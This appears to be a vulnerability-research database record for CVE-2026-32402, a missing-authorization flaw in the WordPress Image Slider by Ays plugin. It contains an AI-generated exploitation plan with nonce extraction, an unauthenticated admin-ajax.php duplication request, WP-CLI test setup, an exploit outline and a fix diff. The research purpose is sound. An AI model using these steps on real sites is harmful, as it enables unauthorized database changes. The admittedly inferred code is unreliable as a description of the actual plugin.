[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqyyh-3u1vw94-wQ9ABz5qOa-ansOMn80gPyLi-VjrNg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32402","image-slider-by-ays-missing-authorization","Image Slider by Ays \u003C= 2.7.1 - Missing Authorization","The Image Slider by Ays plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.7.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","ays-slider",null,"\u003C=2.7.1","2.7.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-21 00:00:00","2026-04-15 21:13:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe0bcd2f0-5944-48c0-9d08-3177fbe4b47f?source=api-prod",54,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-32402 (Image Slider by Ays)\n\n## 1. Vulnerability Summary\nThe **Image Slider by Ays** plugin (up to version 2.7.1) contains a missing authorization vulnerability. Specifically, certain AJAX actions intended for administrative use are registered with `wp_ajax_nopriv_` or fail to implement `current_user_can()` checks in their callbacks. This allows unauthenticated attackers to perform privileged actions, such as duplicating sliders, modifying settings, or accessing slider data, which should be restricted to users with `manage_options` or similar capabilities.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `ays_slider_duplicate_slider` (Targeting the slider duplication functionality as the unauthorized action).\n*   **Payload Parameter:** `ays_slider_id` (The ID of the slider to duplicate).\n*   **Authentication:** Unauthenticated (via `wp_ajax_nopriv_` hook).\n*   **Preconditions:** At least one slider must exist in the system to be duplicated.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers AJAX handlers in `includes\u002Fclass-ays-slider-ajax.php` or `admin\u002Fclass-ays-slider-admin.php`.\n    *   `add_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );`\n    *   `add_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );`\n2.  **Callback:** The function `ays_slider_duplicate_slider` is invoked.\n3.  **Missing Check:** Inside the callback, the code likely checks for a nonce using `check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' )` but fails to call `current_user_can( 'manage_options' )`.\n4.  **Execution:** The function proceeds to clone the slider database entry in the `{wpdb->prefix}ays_slider_sliders` and `{wpdb->prefix}ays_slider_slides` tables.\n\n## 4. Nonce Acquisition Strategy\nThe plugin typically enqueues its scripts and localizes a nonce for AJAX operations. This nonce is often available on the frontend if a slider shortcode is present on a page.\n\n*   **Shortcode:** `[ays_slider id=\"1\"]`\n*   **JS Localization Key:** `ays_slider_ajax` or `ays_slider_admin_obj`\n*   **Nonce Key:** `ays_slider_nonce`\n\n**Strategy:**\n1.  Create a test slider using WP-CLI.\n2.  Create a public WordPress page containing the slider shortcode.\n3.  Navigate to that page using the browser.\n4.  Execute JavaScript via `browser_eval` to extract the nonce.\n\n```javascript\n\u002F\u002F Extraction command\nbrowser_eval(\"ays_slider_ajax?.ays_slider_nonce || ays_slider_admin_obj?.ays_slider_nonce\")\n```\n\n## 5. Exploitation Strategy\n1.  **Preparation:** Identify a valid slider ID (e.g., `1`).\n2.  **Nonce Retrieval:** Use the \"Test Data Setup\" steps below to get a valid `ays_slider_nonce`.\n3.  **Exploit Request:** Send a POST request to `admin-ajax.php` to trigger the unauthorized duplication.\n\n**HTTP Request:**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Fvulnerable-test.local\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=ays_slider_duplicate_slider&ays_slider_id=1&ays_slider_nonce=[EXTRACTED_NONCE]\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `ays-slider` version 2.7.1 is installed.\n2.  **Create Slider:**\n    ```bash\n    # Create a slider manually or via SQL if CLI command is not available\n    wp db query \"INSERT INTO wp_ays_slider_sliders (title, author, status) VALUES ('Original Slider', 1, 'publish');\"\n    # Note the ID (usually 1)\n    ```\n3.  **Create Page with Shortcode:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Slider Page\" --post_status=publish --post_content='[ays_slider id=\"1\"]'\n    ```\n\n## 7. Expected Results\n*   **Response:** The server should return a JSON response indicating success (e.g., `{\"status\":true,\"id\":2}` or a redirect\u002FHTML fragment of the new slider).\n*   **Unauthorized Action:** A new row should be created in the `wp_ays_slider_sliders` table, duplicating the data from the original slider ID.\n\n## 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify a new slider exists with a different ID but identical content.\n    ```bash\n    wp db query \"SELECT id, title FROM wp_ays_slider_sliders;\"\n    ```\n2.  **Confirm Count:**\n    ```bash\n    # Initially 1 slider, after exploit should be 2\n    wp db query \"SELECT COUNT(*) FROM wp_ays_slider_sliders;\"\n    ```\n\n## 9. Alternative Approaches\nIf `ays_slider_duplicate_slider` is not the vulnerable action, search for other `nopriv` registrations:\n1.  Search the codebase for `wp_ajax_nopriv_`.\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fays-slider\u002F\n    ```\n2.  Check for `ays_slider_save_settings` or `ays_slider_export_sliders` actions.\n3.  If a nonce check is missing entirely, omit the `ays_slider_nonce` parameter in the `Exploitation Strategy` and attempt the request directly.\n4.  Check if `ays_slider_get_sliders` allows unauthorized data leakage of all slider configurations.","The Image Slider by Ays plugin for WordPress lacks authorization checks in several of its AJAX handlers, specifically functions like slider duplication. This allow unauthenticated attackers to perform administrative actions by exploiting functions registered with the nopriv hook that do not verify the caller's capabilities.","\u002F\u002F admin\u002Fclass-ays-slider-admin.php (inferred location)\n\n\u002F\u002F Registration of the AJAX action for both logged-in and unauthenticated users\nadd_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );\nadd_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );\n\npublic function ays_slider_duplicate_slider() {\n    \u002F\u002F Nonce check exists, but the nonce is localized to frontend scripts\n    check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );\n    \n    $slider_id = isset($_POST['ays_slider_id']) ? intval($_POST['ays_slider_id']) : 0;\n    \n    \u002F\u002F VULNERABILITY: Missing current_user_can('manage_options') check before performing action\n    \n    $new_id = $this->duplicate_slider($slider_id);\n    wp_send_json_success(array('id' => $new_id));\n}","--- a\u002Fadmin\u002Fclass-ays-slider-admin.php\n+++ b\u002Fadmin\u002Fclass-ays-slider-admin.php\n@@ -10,6 +10,10 @@\n \tpublic function ays_slider_duplicate_slider() {\n \t\tcheck_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );\n \n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( array( 'message' => 'Unauthorized' ) );\n+\t\t}\n+\n \t\t$slider_id = isset( $_POST['ays_slider_id'] ) ? intval( $_POST['ays_slider_id'] ) : 0;\n \t\tif ( $slider_id > 0 ) {\n \t\t\t$new_id = $this->duplicate_slider( $slider_id );","1. Find a public-facing page on the target site that embeds an Image Slider using a shortcode.\n2. Extract the AJAX security nonce ('ays_slider_nonce') from the localized JavaScript objects (typically 'ays_slider_ajax' or 'ays_slider_admin_obj') found in the page's source code.\n3. Identify the 'ays_slider_id' of an existing slider to be targeted.\n4. Send an unauthenticated POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters: 'action=ays_slider_duplicate_slider', 'ays_slider_id=[TARGET_ID]', and 'ays_slider_nonce=[EXTRACTED_NONCE]'.\n5. The plugin will process the duplication request without verifying if the user has administrative privileges, effectively allowing unauthorized database modifications.","gemini-3-flash-preview","2026-04-19 01:52:13","2026-04-19 01:53:22",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags"]